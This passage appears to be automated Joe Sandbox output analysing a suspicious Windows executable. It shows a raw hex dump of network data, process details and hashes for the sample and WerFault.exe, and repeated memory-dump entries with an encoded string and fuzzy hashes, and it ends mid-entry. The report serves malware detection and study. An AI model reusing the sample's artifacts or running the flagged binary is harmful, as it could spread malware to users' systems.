                                                                                                                                                                              2024-12-23 07:09:02 UTC1024INData Raw: 82 a2 79 5a 3a 9b 03 b4 fe f5 73 c1 ba 19 d0 0d 81 18 01 c1 34 02 82 08 98 89 08 9c 89 08 60 6b 98 42 7a a9 58 ad d3 0a 47 db 28 06 c0 11 98 5f 52 54 6a bb e0 af a4 9a 8a 0b b9 45 6f f1 bf fa 3a f5 ef 52 4e 52 8e 52 b6 f8 94 f2 c6 f2 68 fd e3 b9 ff 30 00 38 0d 50 5f 53 4d d5 65 25 54 59 94 4f 0d 55 e5 74 ee f4 09 fa f0 ec 49 3a 51 c7 a2 5f 5a a8 ae 09 a8 a9 28 a5 aa ca 0a 75 11 60 45 05 9e 46 58 a2 fe 0b c7 57 c4 5f 7a 8e a4 f7 08 9f 71 31 f1 14 16 1c 49 c1 fe 61 aa eb 3f fc 50 14 c5 46 e3 c9 7c 5c e7 12 6d f5 4e ea a5 d4 55 b3 1e 4b d7 3e a6 c9 b8 23 c1 17 a4 a5 0f b1 17 11 d6 0d 80 cc 83 d0 22 76 11 e7 2a 17 d8 3f 75 a4 d1 e0 08 f5 4e 79 3b f8 8e dc 80 d8 57 c2 6e 11 df 82 e4 01 47 48 de 68 2b ba 88 eb 98 82 dc 1a 92 bf 4c 24 bf b5 86 f9 3b 3d 4f 02 f9
                                                                                                                                                                              Data Ascii: yZ:s4`kBzXG(_RTjEo:RNRRh08P_SMe%TYOUtI:Q_Z(u`EFXW_zq1Ia?PF|\mNUK>#"v*?uNy;WnGHh+L$;=O


                                                                                                                                                                              Target ID:0
                                                                                                                                                                              Start time:02:08:32
                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                              Path:C:\Users\user\Desktop\zLP3oiwG1g.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\zLP3oiwG1g.exe"
                                                                                                                                                                              Imagebase:0x3b0000
                                                                                                                                                                              File size:2'994'688 bytes
                                                                                                                                                                              MD5 hash:AD848F9EED40C0533C28F2C521395DF8
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:5
                                                                                                                                                                              Start time:02:09:04
                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7300 -s 2028
                                                                                                                                                                              Imagebase:0x4f0000
                                                                                                                                                                              File size:483'680 bytes
                                                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000003.1470717759.000000000037E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0037E000, based on PE: false
                                                                                                                                                                                 • Associated: 00000000.00000003.1618522019.0000000000377000.00000004.00000020.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_3_389000_zLP3oiwG1g.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8
                                                                                                                                                                                • API String ID: 0-503871211
                                                                                                                                                                                • Opcode ID: 6b5427fac6a384e7ded88bbde943d8783c0421d79b53107340a5e9fee4ac5c21
                                                                                                                                                                                • Instruction ID: a058b0c201b26f343e5f6ccda5470cb33253b1fe5e589af703949d09da2af1e3
                                                                                                                                                                                • Opcode Fuzzy Hash: 6b5427fac6a384e7ded88bbde943d8783c0421d79b53107340a5e9fee4ac5c21
                                                                                                                                                                                • Instruction Fuzzy Hash: 0A03D1C6C5F3D26EEB63573458B9280BFA55E27150B1F85CBD4D08F2A3E5440A8EDB22
                                                                                                                                                                                Strings
                                                                                                                                                                                • gKAXFGsJdTSL%2Bl4YRDRif6NbzGtbOjrDaRyCcNphz1ZxPXYqYLzFLPE3Y6L8gNRHkNpflXP5, xrefs: 00345BFA
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000003.1446181758.0000000000342000.00000004.00000020.00020000.00000000.sdmp, Offset: 00342000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_3_342000_zLP3oiwG1g.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: gKAXFGsJdTSL%2Bl4YRDRif6NbzGtbOjrDaRyCcNphz1ZxPXYqYLzFLPE3Y6L8gNRHkNpflXP5
                                                                                                                                                                                • API String ID: 0-3329259477
                                                                                                                                                                                • Opcode ID: 0fb602730799238cdc3471bcaa9a82912441af1f20a4e2f4599049a870d4f2d9
                                                                                                                                                                                • Instruction ID: 1fe0c7deb8042ce98bebdd6f7f094d765c0f1c787d8ef12d6e37a826b30e22da
                                                                                                                                                                                • Opcode Fuzzy Hash: 0fb602730799238cdc3471bcaa9a82912441af1f20a4e2f4599049a870d4f2d9
                                                                                                                                                                                • Instruction Fuzzy Hash: E802EB9A40E7C06FEB138B3458A56927FB4AE17214B5F55DBD0C0CF4A3E2585A0AE373
                                                                                                                                                                                Strings
                                                                                                                                                                                • gKAXFGsJdTSL%2Bl4YRDRif6NbzGtbOjrDaRyCcNphz1ZxPXYqYLzFLPE3Y6L8gNRHkNpflXP5, xrefs: 00345BFA
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000003.1446181758.0000000000342000.00000004.00000020.00020000.00000000.sdmp, Offset: 00342000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_3_342000_zLP3oiwG1g.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: gKAXFGsJdTSL%2Bl4YRDRif6NbzGtbOjrDaRyCcNphz1ZxPXYqYLzFLPE3Y6L8gNRHkNpflXP5
                                                                                                                                                                                • API String ID: 0-3329259477
                                                                                                                                                                                • Opcode ID: 25adcc7dbc452c63a17f1fb693d5a734b1eaecbeb1223d21f041da35d511c85b
                                                                                                                                                                                • Instruction ID: 136c2aaef2b9aff98075c894b9f7074cf27d3deb7bb128da4837edf52e42d382
                                                                                                                                                                                • Opcode Fuzzy Hash: 25adcc7dbc452c63a17f1fb693d5a734b1eaecbeb1223d21f041da35d511c85b
                                                                                                                                                                                • Instruction Fuzzy Hash: 09910E9644E7C15FEB138B3458AA6827FB4AF17214B1F49DBD0C0CF4A3E2585A0ED362
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000003.1446181758.0000000000329000.00000004.00000020.00020000.00000000.sdmp, Offset: 00329000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_3_329000_zLP3oiwG1g.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: f6b648b26ea91fe23654fe0f93bf5214ece0a60755eadb49787aaaa79ccefe16
                                                                                                                                                                                • Instruction ID: a1abd2b96b84a2e67b2ef73799ad2cc96103d120e2dddc958373cd1631802124
                                                                                                                                                                                • Opcode Fuzzy Hash: f6b648b26ea91fe23654fe0f93bf5214ece0a60755eadb49787aaaa79ccefe16
                                                                                                                                                                                • Instruction Fuzzy Hash: 1D12F06285E3E10FCB1787705D7A991BF60692321471EC6CFC8C68F8A3E349994AD367
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000003.1470717759.000000000037E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0037E000, based on PE: false
                                                                                                                                                                                 • Associated: 00000000.00000003.1618522019.0000000000377000.00000004.00000020.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_3_375000_zLP3oiwG1g.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b33d845253c2c07f1d4738301ca1e128d55b4c3f942dbbb6ab874df38a7c156b
                                                                                                                                                                                • Instruction ID: 230da27135d2e8150ff6d2b77e6c705ce332247aad37be112c665e148cc172d2
                                                                                                                                                                                • Opcode Fuzzy Hash: b33d845253c2c07f1d4738301ca1e128d55b4c3f942dbbb6ab874df38a7c156b
                                                                                                                                                                                • Instruction Fuzzy Hash: DED1506684E3C15FD7139B7448796A57FB1AE17214B2F89CBC0C0CF0A3D248586AD723
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000003.1446181758.0000000000329000.00000004.00000020.00020000.00000000.sdmp, Offset: 00329000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_3_329000_zLP3oiwG1g.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 09395fd3c07acf821590c5041824171e21c7efd2234ed3196c85051547e34a95
                                                                                                                                                                                • Instruction ID: 6b1abf455c37afdc7556a58d4c30bec87cb61c404a232eb911c6bd7088618a6e
                                                                                                                                                                                • Opcode Fuzzy Hash: 09395fd3c07acf821590c5041824171e21c7efd2234ed3196c85051547e34a95
                                                                                                                                                                                • Instruction Fuzzy Hash: 6FE1EEA184E3D10FDB178B705D6A591BF70AD2321431E86DFC8CA8F8A3D259984AD763
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000003.1446181758.0000000000329000.00000004.00000020.00020000.00000000.sdmp, Offset: 00329000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_3_329000_zLP3oiwG1g.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4d7e4af7017b035766767f56fcfcec92e5e1d34c2d62f7f88246689ab620d459
                                                                                                                                                                                • Instruction ID: 1a1197295a012e8ddf9a2f31ad1cdfc8e922844e1d249492b03d697da670e401